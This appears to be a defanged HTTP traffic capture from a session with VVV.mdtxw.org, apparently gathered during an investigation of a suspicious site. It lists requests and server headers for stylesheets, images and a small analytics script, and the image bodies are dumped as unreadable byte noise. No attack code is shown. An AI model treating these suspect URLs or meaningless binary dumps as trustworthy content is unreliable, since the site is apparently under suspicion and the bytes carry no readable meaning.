 margin-left:4px; position:relative;}...more { width:6px; height:5px; 
position:absolute; left:0;_left:4px; top:3px; background-position:-14p
x -40px; }...vico { background-position:0 -114px; padding-left:23px; }
...vico_right{ padding-right:20px; background-position:right -496p<<< skipped >>>

GET /miniindex/images/Untitled-2.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 18896

Content-Type: image/gif

Last-Modified: Sun, 13 Apr 2014 02:21:34 GMT

Accept-Ranges: bytes

ETag: "0cbe616bf56cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:48 GMT
GIF89a..s....SE3...mWG....vU.eF........ivcO....tGW6$TOH..V.ZD.f8.W8.ye
I ...\H3$....gE.......fD..Y..j.fH)...T9.......Z8.....z........de;)..f.
..dG6..swI5.tK....zS.....a....qF%"..wV.{fxT;5%...v..m....vI.......L4..
.fddfB).iV.hS&&!82%......wC .b>........d. ............r..Y4* ......
..i....pY.....j..c....(!wvu.|[..b.H ..t..u...E) .kR.kG.]@eR;..r.......
.o.......|O......H:0...U;..zR........d.....l..k..b..q%4#643.....j.|\..
..L1;A/.V-..{.....c.....z.....J.....|..l....rP...zsd.....O..p.......lM
..a....~S.oL{_;g4.sj`.R0.s[@...pPzT-S.!..~.L,..}........k;....[s>..
.>....._.....}.....i..]fO-.........b\]..n..X.t\........."......{aH@
@.._BDA...4..&7-4-,`gb.........qprllm.................................
.............J .oN...w{|........._^Z..p........{......... ,(..........
..34>..pmui.........!..NETSCAPE2.0.....!.......,......s......L.!...
...........Y...C......B..A..\N.$.J.IQkD.H....(... .'[email protected]
f.v..]......N....-[....d.&. ..`....5...^......B1X..u.%"..g,.......]N.(
D.....R.L..e..3...e.....2k......<A.,..A.k*....-.<...m.F..9......
.......:q.KC.rO........Xt...:.7....S.d.Q..4...SO.<2w.z........Y....
.b.qm-..1.^.........e.4.$b0B.q!a!!.]p!.sk...Fl`........4t`b..]BJ...a.y
........^..4..'.hs.X....<.pe................\.qa%HXp.\.ehqJ.....u.i
Y..4..&.D$pI...H.f4.I#[email protected]&..Y.t.d.'0(...I.!..u...;H
G]ue.F.w$iq...4PC...........hv..YQQ..S;#..[.W)@...*..5L.....H(Fq.b...W
2W.....iF.p.*G..!.,Z.*@.Q.G.O..%..s...h...E$.. ....q....k,X.....'H...r
Q...qU.......F.^...rQ..,.hq.1..d'f2v&T....2Q=E.....ZC=........U..`<<< skipped >>>

GET /miniindex/tj.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 279

Content-Type: application/x-javascript

Last-Modified: Thu, 10 Apr 2014 18:44:12 GMT

Accept-Ranges: bytes

ETag: "0665eddec54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:48 GMT
var cnzz_protocol = (("https:" == document.location.protocol) ? " http
s://" : " hXXp://");document.write(unescape(""));<
/font>....

GET /miniindex/inc/ico_new2.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 55317

Content-Type: image/png

Last-Modified: Thu, 10 Apr 2014 17:05:46 GMT

Accept-Ranges: bytes

ETag: "0511e1ddf54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:48 GMT
.PNG........IHDR...(... .....QE .....sBIT....|.d.....pHYs...........~.
....tEXtSoftware.Adobe Fireworks CS5q..6....prVWx....Q.A...vAX.]....@M
F....X..!..s!..1._Q..5...{.>LU...|....*..)b....}e=...%...,.fQ.."2.=
..y.w/..............M...u.4l!._....!.W.?.....'m>..........O.v....r-
...5M......f.x... ..l....^<.=....j.........S...1..6_..............e
{u......2....b...HmkBF................................................
........................).3...D.mkTSx..}K.$.Y.ywggzfv.k. qi../........
........z.g........g..CS6X.....6.........w..B !q....}.......Y.UY...qN.
vV>"3..}.......a.......8.}..>8.G.......98v4[w./..o.....>.|..I
.-m..9L.=M......k.....8.^.[..o...::n.......qk......V............6..e8.
..................}.._.o.a.....x........z....L.Q....ooC.R.P...5.h..s..
....`.C......ui.?...m.....vp.;8..Q{...Cv...=d...m6WB(....F.]..........
...A.6........z.f...vBd..B..Gf.u...Y.!.{.J&bc1l...h..DQ..m..D...4f...b
.......1x<..7..>......o{..........w9...g........;.W.`...M...fP..
..MB..i..j.A.8%..zmvf..*..8.mb..V........)..r...^..x*..b....2....h....
......8~H...g..U....f.F;.ln.asB.9e..x.n........f....[..w.......;......
[email protected]....<....y.8...I.....~.(.*E.....].].......B...h..A...
.RzFz.g..L6.)`0...r.|..%..30n/..i...G...Mc.h...A.1h4.....&.f.....{...D
..1.........-.A2K;...DI.9NF8)...o....E2.T...bPY.*.E~...C?l..-p`.0.q0..
9v..F...c.m.5......:.B....-..*`...S..t..B.....>.ZOsH.1...x..?%...i.
.F.....b...=....*..e3..0.aY.$..0.&.Z..A.TQ........(R7....S.....g._...=
.... [email protected]...`O_.......uL...<<< skipped >>>

GET /miniindex/inc/close.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 2526

Content-Type: image/png

Last-Modified: Thu, 10 Apr 2014 17:05:46 GMT

Accept-Ranges: bytes

ETag: "0511e1ddf54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:49 GMT
.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx..Z{..U......dw.v....H*...H.....L..i.."j...5.bL..b..Y.5.(.
.FC.DH..X(...#.XK....[[email protected]..}.<....f.....|...3....|.........
[email protected]._'.K?...(..J.3.6..Mw.......S.i.EC!|.q..Q,.N.....U.(....
.....a.w......o^2..w..t]....d......t....(.m.F...fwN.W.........N..#.a..
.|.i 5..4..H.'.C..BJ.......)(.8.......,RJ....T.].X.......V,GRz........
.0D./..).....e.P,.._A.'][email protected]......$.W.b.1M....g.....
t....T.*.#.'%Y?....P.b..y..,..z..4...r..-}..%D..M.h../Z..S.......5\.,.
wq..3.....U....D.2..-....' .e[mm..,U.(.2.8..r., .P.).......C@ ..qBtob=
..|oU......5._..6.J&.hD..R........_.6...-.Z..$....s..)..v..Yh.........
....p..[..c.>...Tp.w.9...?p...}.......}..`..!..=.b...m...3$.}......
.`M....I(e......,[email protected]\........-_.~$Z..?....~8Q6..MW.....f*.0D
@ ......p.U..Zh..Dd{e..a(...._...j?....D&.....I-:.M.k......r%.....D..m
..7Os.........H........*.AH....1.k..8n..m.....I.........wg......S.Jk.r
.........Z...A.m......q...F...wq.H..u......}.}4.F..#.P.e..@..!....h.Q.
.}r.&V].}h.r8.....~...G$ b..P......z{..'.......{..Z. 62.W.6.w...r-...,
.t.j3..#`....X.'..L.....33..`...q..p....\K>....1..,*......!|.7.Q-`.
T.........|..#..U.p.>.D.C..ZFmQ...\.fTJ.N....q.../.AS.......}..y.R.
.......y...`c..#....Y.$...A....y..L....].x.;..X4.x$I.IX..._...q.w..0O.
.N...MB.y/.!Z.,......U._...e.........TO..._.w{../...= Q%......v.._....
TO...W..S.O.Hv..G..Z..x.~t...Be.....K....'.........N.......l..;.T..O..
.....w.n...a....j>....%......u..L.......M...}.#..._.G....b8....<<< skipped >>>

GET /miniindex/images/b13.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 42296

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:47:34 GMT

Accept-Ranges: bytes

ETag: "0affbcbb557cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:49 GMT
......JFIF.....H.H.....[Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 15:47:34....................
.................................................................&.(..
...............................%.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..8........~.........A...^ ..6.i...
.....gf.m#X......:.`........5..........*.[cg71.\]..'.sO.....:m.H....{.
r....Ob.H....e...,x.@.%.......[..-=.<=...2A...2}...=...Z.....kI.?.P
{.s..eOi<..IL)..Z...?...mi..i.((..E.....{QI..4.~W...9......l..\#...
e....m.y;t". ecn.....u..W...cfD.l..p%X....Yfb,..v5..<9..:Dr%B...{.i
[email protected]#S.......`...G?I....P...P).#!d0...F.:W...m.6......I.V.
...40...Z.. ...O.o...........%.......TI.*.v.....Y...%...5..}?Y....h,.o
;.....)n.5...t2u.5....-..k@-....$.F.v..J....'Yk.O..]*.-.X]..4.......a*
....E... .....S~g...,.D4=WF$..uL,.[n.......i"=.\._N.O.p....H.O.......u
..T-...*....$......*hv%./..;.^....A.??.. ._.#h.......>......U.}<<< skipped >>>

GET /miniindex/images/b15.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 38304

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:58:46 GMT

Accept-Ranges: bytes

ETag: "0bf865cb757cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:49 GMT
......JFIF.....H.H.....>Exif..MM.*.............................b...
........j.(...........1.........r.2...........i.................H.....
..H....Adobe Photoshop CS Windows.2014:04:14 15:58:46.................
....................................................................&.
(.........................................H.......H..........JFIF.....
H.H......Adobe_CM......Adobe.d........................................
......................................................................
...................................f...."................?............
..............................................................3......!
.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'..
.............Vfv........7GWgw........................5.....!1..AQaq"..
2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F............
...Vfv........'7GWgw.................?....Ny)*..Jb..RS..T..IH.....%...
......=l..i<.......{..?z......w..2...{}...........'.S..-..e_b6XH!..
....WzV{..jt...............?Q.6N.rn........W..?X...t....)m7. .Iq.....7
.s.....h..S,"fk.]].#E...$...X.).r....1R*%%1L.S$.....d.UY.....6..A.i..m
{....z.:..Y....l,.`k.C...3.Qg.........oV...g...........MZ..{.a........
.Z....... y..fQc3k.%......67_.....clg. A.~...A.(b2<W.d..."=.bTJ)...
?r....?qR.<...K.........4.k...]7.:.v.......nf.=..]F{.02K.`T.dx4.n..
....".w..GVD...h.D...2..3..>;/...."@.........)~=N...{@.{...=..w.!.7
..Y.....vz.eU....V...s_.s....N{)....S0.W;.>..;~....v.&V...fc./g.k`.
f..q.z..'.*x.~.j1.YHt.....ng `....D.K^/SQ1R*%\s.*%H..T..).b....$..<<< skipped >>>

GET /miniindex/images/b16.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 43598

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:01:35 GMT

Accept-Ranges: bytes

ETag: "801942c1b757cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:50 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:01:34....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..{..h....iku..C.v..8D.. 1...5'r.5.
.}....)T.....sv...'E'....'D.T....?w..j.....8l....]...c...G........C.Ce
.DhH.0....L.N.......;..H........F..s..v...A...._...ICu.v.vC.F0>.;..
.......;.c6.....t~.^NCr^.|:X.k.....&.R..k=/O....'. .~...|..l..9..-.#A.
.O...5ut............c.` ...c.^..&(e=H.."46G...]g.=.8Y./...V..z.6~.. ..
1.G._N.z....U..U.`...O.f.o{e..[K..............]n}..u..^..m..-l.5..t?..
.k.. w....."..-.....:.....^........t...........Sv......5._c.!.....s. .
Kk.m..kO..v.{N.b...}......A.......I..1.h..!...&O.W..._........C..T....
.....gJ..X.."!:........{........?.]..;.V.'B..T9.X.{....".[..."..3}.]. 
Y.....g.*9..G<}....P.uE.7*.....q.....?h.......O'.[t<.....V..<<< skipped >>>

GET /miniindex/images/b18.JPG HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23977

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:14:46 GMT

Accept-Ranges: bytes

ETag: "01fbb98b957cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:50 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:14:46....................
.........l...........A...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A.l.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..w=.Ku vX...~U..p.iM.....ec...'r..
...g.:...N.e.].^...v=O?E.7}t..%..i.8.C...D.t.a...%...........?$.-.k...
.F...K{~sTs....4........].d/L3...N..R<...T.2F2......;..nt..Y..4....
W.....C|..;.}z......H.. o.a...K}.z.I........X...CuN..w}N..5..o..`...k.
......7...?GN....-.;[email protected].'.|.8...#,....8&v.a.Ay......
?=....W.W......KA.}.WG..W[.:.u.....^K....4h...........5..->.\d.....
.R..L..w.... G....q.....)......W.,..2..l........52..g}..L..?[..O..Sg.?
......}......G.X....C..f.N...b6}/..#..xA..`....u.>O...,..4...y..v5.
Y]...RK...t..R....].y..M...>.. .c?7.2...n{..Y.CI..O....f.g..l..."h.
.....5/[email protected]..^...u.;...1..........kk.[.j.......3<<< skipped >>>

GET /miniindex/images/b19.JPG HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 20701

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:17:59 GMT

Accept-Ranges: bytes

ETag: "8095c4bba57cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:50 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:17:58....................
.........l...........A...........................................&.(..
...............................\.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A.l.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....mS...0..........z../i....F..Z.-
.....u.!.`......Hy...G...Cu.a.i.^........k..w.y/S..?).Y$.......f..E...
...z.P{..1.-..Ak.....e.o......2[......8..~...'S.-P.n...~....U. .o...5.
......]}.w..?n{.(#I..6.w..?K..gO.....qc-i.........;..........g. .4i.A.
......V.R.nf#..N..:;...r...L.....V..o...p.V.......} ...<:.K\.V.5.-.
]k...c[i..j......E.._P..F..f.v..P...ysH..;...g........d..E.l.a,s{.....
.......8..-..7E....8..?......I.-..S..#.2...{.er..5...n........._...c?k
...o.>........n\....V.`4.Y.y.{O^.....a.k.....;........^...#.b6..?i.
;....;.....BG.2e...=^w.e;[email protected]=.h[.z...(.L....{..z....o..4,...
.9,...e....N.........Ocoq>......T<VI..........df6..N8....q..<<< skipped >>>

GET /miniindex/images/aaa4.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 61094

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:51 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:05:17....................
.................................................................&.(..
...............................R.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.....[....i.r.H.e.4.T...-.96l6i[.%.
#..j.../Q.-~;Hc......O.}....o....u<lL.G.)m........s.9.......8tV.9..
..8..V........N.Y...L.V...&.M.y.Yz..C*....c.. ...j?..j.Y...M.{6-n..;..
.LF.b....*.C.kl}}..]>.U.h.-..............j...cq..0....e..Cmo..-w..[
N..Vi...pX.....-k....=-.]mk>...I2D..i......._......z....5.6....\v..
 \.?7.s...de.mU..p..'..\._X..1............ZX.......M.....$.cZ.........
.FW....k....S.1..f^.c......q......I...^.zN...b... ~~Q#Su..qT........=.
..".G.....h1.......;)4..[lk.....A.....ad.\..e.`'..-..9z^mmu..4'.......
.p.{...?M..5..h..'.j.[80.....FwF.K..8.p~I}....R.SI.S0]&...V.)}...=....
..$..C..x)......&...PTA" .W......K..B/...V,.........3*...kC...i#..<<< skipped >>>

GET /miniindex/images/aaa3.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 67971

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:51 GMT
......JFIF.....`.`.....fExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:01:17....................
.................................................................&.(..
...............................0.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..EU....G.S.........H)..3.....?{..$
..k..7}.?..t ...N&`|..~......d.&.............. y...q.........?...K..l.
....R......?...v..I.g.Dy6...w.n......m..R...?.j.....lI i...G.o.>...
}......E.nuB.5$3.......}...e.c.E8-6.[.v...k_f......k)o......]......6..
.1..s......_.. .....].....7..g....z...w.k...j.~..........]..[.P#k.}nic
.?....\....Z...9.]=.O.f......Pyy..L......u....v.z...G..........u.....n
....n......"[email protected]\OG*...s..*...e..kl;^.....W...W...Y..o.....7....s}.
Xw4.i......c..5...g....N'VcH...A.g....%..Dw.....fQw...9pV...w8.6....{.
....]...q=7)...e........z.#.^.e.;..~;...JYW...U...Z.:*W......U?s_.....
.....B...H*L.A... .N.(...3..Q.._.U..A..:....?.........~.._.>z.Y<<< skipped >>>

GET /miniindex/images/aaa6.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40601

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:53 GMT
......JFIF.....`.`.....cExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:17:06....................
.................................................................&.(..
...............................-.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....`..r.Z..l.t...q-..deLOaN;..._.=
t.1.K.7...... ..m.1.;..gs....rf.....a.c.44....mZ.u.4...c..v9...utx?\l.
......@l$7i?E.5...?........d.........E"...k*......c..........s.^.]W..u
,'.\.>.#..E.:..N.f.../M{...2|.k.h.@>..-f..g}..[.u...a..9..4.....
.......-q.)%..'$..>.......... :.E......S...K.....qr,....`x'e. .?5..
.#....hz^..`.cN.. .|.#.....2>z%ji.J.s}..4.c.....a...C..u...\.mS....
.`....A3......l(4C..Uo.x.n.... .U@...{{......vRw........i..M{...8.u..:
.......!q...@t[.KG.{....1>........-k...*C....$.R;...Z...,< u;}6.
5'.......6.....x...)...l-s}..H.)......bh.h.k/....o5.u,WWy.y....w5.~...
^..wz~.}.W....o....t%@Z.'@....S=@.#..n...Sa.H.{J...V..Wcn{F&.....^<<< skipped >>>

GET /miniindex/images/aaa1.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 45855

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:53 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 16:43:10....................
.....................^...........................................&.(..
...............................w.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..~..e........l%.....Y{.m.9..V.[..^
...3..4N..X.........m.. .U.?....u.Q.y....!.9....NN.S\....*......Z?...d
`uW.9.....1{..Xo..G....V.~{.W....S. .09*P.~..}_V.......qlr......K.zKP.
}g.y....nE..5.8TN!{....K\.O.w...UuZ....[U....t.....6<u.....[..[_S..
..I...g........^.h.^?..*Et.["..\CZ.K.x...s.........y..QwM.>..w.....
.Z..EWdc.Z.,.........k}e...Z..3G7....I....y]?Xp......N8~]..m.4}..#!...
.W................w.K\..B4#.....{(cf.g...k.}o.....<....o...>.#1.
^.D....y__...u..7]g...[..>.]......Y.w..WW.Z..-q.B4\?B.......2.FV].s
l..z..W4[.{.s....A....I.\.j...UR].1..8.;..nw... .bH.<Z]o..tN.......
UU.7.c.eU....Z......tN...]E.....H....-...u.......*.72..MM..Y.r..v.<<< skipped >>>

GET /miniindex/images/aaa2.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40325

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:53 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 16:57:14....................
.....................k...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................J...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?...`..?..............0h....t....X..
[email protected]'[email protected]=.{..>.K.<.w........F
.}...S..$F..........#&.!_.{r.q.....;...&.~......T.3/9..M..H<WX..v..
.....J...}..v.. ..0.a...z..S_.....%.s.X88.?.8........R..o.V.RR].....m.
..K|..-.K?Us...............P......t..3............N.8......2~h.X55....
.....}.....]K..Z.....9.....w.E......SN........r.}...t ......Q .w......
